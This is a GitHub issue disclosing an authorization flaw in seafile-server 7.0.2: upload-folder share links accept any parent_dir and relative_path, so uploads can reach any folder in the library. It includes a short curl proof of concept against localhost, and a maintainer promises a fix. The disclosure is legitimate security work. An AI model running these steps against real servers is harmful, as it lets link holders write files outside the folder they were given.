### ISSUE TITLE
seafile-server doesn't check upload-link obj_id

### ISSUE THREAD

**Issue by B4dM4n** [haiwen/seafile#2216]
# Summary

When uploading a file through the `upload-api` into a upload folder link, the user can upload files into any folder inside the repository that contains the upload folder .

# Steps to reproduce

```sh
auth="f2210dacd9c6ccb8133606d94ff8e61d99b477fd"
repo_id="afc3b694-7d4c-4b8a-86a4-89c9f3261b12"

# create a upload share link
token=$(curl -d "path=/Test/&repo_id=$repo_id" \
  -H "Authorization: Token $auth" \
  http://127.0.0.1/api/v2.1/upload-links/ | \
  jq -r .token)
# get a file upload link for that folder
upload_link=$(curl http://127.0.0.1/api/v2.1/upload-links/$token/upload/ | \
  jq -r .upload_link)
# upload a file into the library root
curl -F file=@date.txt -F parent_dir=/ $upload_link
# or any other path
curl -F file=@date.txt -F parent_dir=/ -F relative_path=any/other/path $upload_link
# ensure file exists in the library root
curl -H "Authorization: Token $auth" \
  "http://127.0.0.1/api2/repos/$repo_id/file/detail/?p=/date.txt"
```

# Tested version

`seafile-server-7.0.2`

# Findings

When a upload link is created through the [UploadLinkUpload](https://github.com/haiwen/seahub/blob/master/seahub/api2/endpoints/upload_links.py#L285) API, the `dir_id` that is passed to [seaf_web_at_manager_get_access_token](https://github.com/haiwen/seafile-server/blob/master/server/web-accesstoken-mgr.c#L126) as the `obj_id` is never checked by the [upload_api_cb](https://github.com/haiwen/seafile-server/blob/master/server/upload-file.c#L532) function.

This allows to upload files into any path inside the repository containing the upload folder link by specifying `parent_dir` and `relative_path` during file upload.

**Comment by freeplant** [comment]
This will be fixed in the next release.
